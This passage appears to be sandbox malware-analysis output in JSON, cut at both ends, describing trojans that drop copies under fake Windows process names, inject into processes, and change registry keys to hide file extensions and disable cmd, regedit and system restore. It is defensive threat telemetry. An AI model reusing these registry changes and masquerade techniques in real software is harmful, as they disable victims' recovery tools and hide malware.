4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000c80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" wrote 46887 bytes starting with PE header signature to file \"C:\\Windows\\xk.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" wrote 46906 bytes starting with PE header signature to file \"C:\\xk.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" wrote 46918 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" wrote 46890 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" wrote 46858 bytes starting with PE header signature to file \"C:\\Windows\\System32\\Mig2.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" wrote 46855 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" wrote 46880 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" wrote 46877 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" wrote 46866 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" wrote 46777 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" wrote 46860 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" wrote 46928 bytes starting with PE header signature to file \"C:\\XK\\New Folder.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" wrote 46897 bytes starting with PE header signature to file \"C:\\Data %OSUSER%.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" wrote 46762 bytes starting with PE header signature to file \"C:\\XK\\New Folder.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" wrote 46874 bytes starting with PE header signature to file \"C:\\Data %OSUSER%.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "api-223", "type": 6, "relevance": 3, "name": "Calls an API typically used to query local/system time as file time", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"FileTimeToLocalFileTime\" with parameter 30e5fef92b04ca01 & 0M (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"FileTimeToSystemTime\" (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"FileTimeToLocalFileTime\" with parameter cdf6d7ce2a9edb01 & cd5e9c30339edb01 (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"FileTimeToLocalFileTime\" with parameter 925473d42a9edb01 & 92bc3736339edb01 (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"FileTimeToLocalFileTime\" with parameter 521778d42a9edb01 & 527f3c36339edb01 (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"FileTimeToLocalFileTime\" with parameter Y8 & 59a07536339edb01 (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"FileTimeToLocalFileTime\" with parameter 19fbb5d42a9edb01 & 19637a36339edb01 (UID: 00000000-00005328)", "origin": "API Call", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-104", "type": 6, "relevance": 5, "name": "Calls an API typically used to enumerate process encountered in a system snapshot", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"Process32FirstW with parameter [System Process]\" (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"Process32NextW with parameter System\" (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"Process32NextW with parameter smss.exe\" (UID: 00000000-00005328)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" marked \"C:\\share\\XK\\New Folder.exe\" for deletion\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" marked \"C:\\share\\Data %OSUSER%.exe\" for deletion\n \"xk.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\~DF5DDDB4C24E172932.TMP\" for deletion\n \"IExplorer.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\~DFEEE8F180E385A14D.TMP\" for deletion\n \"WINLOGON.EXE\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\~DFA7D2AB1E1A486350.TMP\" for deletion\n \"CSRSS.EXE\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\~DFE8B4245F560E37D3.TMP\" for deletion\n \"SERVICES.EXE\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\~DF05862413E6CAB249.TMP\" for deletion\n \"LSASS.EXE\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\~DF6476607D75496E84.TMP\" for deletion\n \"SMSS.EXE\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\~DFBCABAC87A67A7032.TMP\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"xk.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\~DF5DDDB4C24E172932.TMP\" with delete access\n \"IExplorer.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\~DFEEE8F180E385A14D.TMP\" with delete access\n \"WINLOGON.EXE\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\~DFA7D2AB1E1A486350.TMP\" with delete access\n \"CSRSS.EXE\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\~DFE8B4245F560E37D3.TMP\" with delete access\n \"SERVICES.EXE\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\~DF05862413E6CAB249.TMP\" with delete access\n \"LSASS.EXE\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\~DF6476607D75496E84.TMP\" with delete access\n \"SMSS.EXE\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\~DFBCABAC87A67A7032.TMP\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (UID: 00000000-00005328)\n Spawned process \"xk.exe\" (UID: 00000000-00003688)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005180)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004256)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005476)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00001968)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003760)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00005196)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "api-31", "type": 6, "relevance": 9, "name": "Tries to access unusual system drive letters", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" touched \"K:\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" touched \"L:\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" touched \"M:\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" touched \"N:\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" touched \"O:\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" touched \"P:\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" touched \"Q:\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" touched \"R:\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" touched \"S:\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" touched \"T:\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" touched \"U:\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" touched \"V:\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" touched \"W:\"", "origin": "API Call", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\xk.exe\" (Handle: 312)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\xk.exe\" (Handle: 312)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\xk.exe\" (Handle: 312)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 424)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 424)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 424)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 312)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 312)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 312)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 424)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 424)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 424)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 312)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 312)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 312)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 424)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 424)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 424)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 312)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 312)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 312)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" allocated memory in \"C:\\cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "registry-15", "type": 3, "relevance": 5, "name": "Changes file extension appearance of the explorer", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\\\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"HIDEFILEEXT\"; Value: \"01000000\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"HIDDEN\"; Value: \"00000000\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"SHOWSUPERHIDDEN\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1546.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/001"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-33", "type": 9, "relevance": 10, "name": "Creates a fake system process", "description": "Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00004256)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00005476)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00001968)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003760)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00005196)", "origin": "Monitored Target", "attck_id": "T1036.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/005"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Ransomware/Banking", "identifier": "registry-21", "type": 3, "relevance": 6, "name": "Disables Command Prompt (cmd)", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SYSTEM\"; Key: \"DISABLECMD\"; Value: \"01000000\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Ransomware/Banking", "identifier": "registry-2", "type": 3, "relevance": 9, "name": "Disables Windows Registry Editor (regedit)", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLEREGISTRYTOOLS\"; Value: \"01000000\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLEREGISTRYTOOLS\"; Value: \"01000000\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Destruction", "identifier": "registry-23", "type": 3, "relevance": 9, "name": "Disables system restore", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\SYSTEMRESTORE\"; Key: \"DISABLECONFIG\"; Value: \"01000000\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\SYSTEMRESTORE\"; Key: \"DISABLESR\"; Value: \"01000000\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49
https://hybrid-analysis.com/sample/85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49
Hybrid Analysis - Killers
{"size": 13056, "type": "PE32 executable (native) Intel 80386, for MS Windows", "submit_name": "85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49", "sha256": "85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49", "av_detect": 96, "vx_family": "Trojan.Generic", "threat_score": 27, "threat_level": 3, "verdict": "no verdict", "total_processes": 1, "total_signatures": 22, "file_metadata": {"file_compositions": [], "imported_objects": [], "file_analysis": [], "total_file_compositions_imports": null}, "processes": [{"uid": "68ed477cf30b39d93521e1ad2e865885", "name": "<Input Sample>"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "string-315", "type": 2, "relevance": 1, "name": "Contains ability to create/open files (API string)", "description": 